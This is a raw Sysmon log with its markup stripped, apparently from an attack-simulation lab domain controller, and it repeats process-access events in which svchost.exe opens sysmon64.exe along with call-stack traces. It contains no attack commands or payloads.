13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 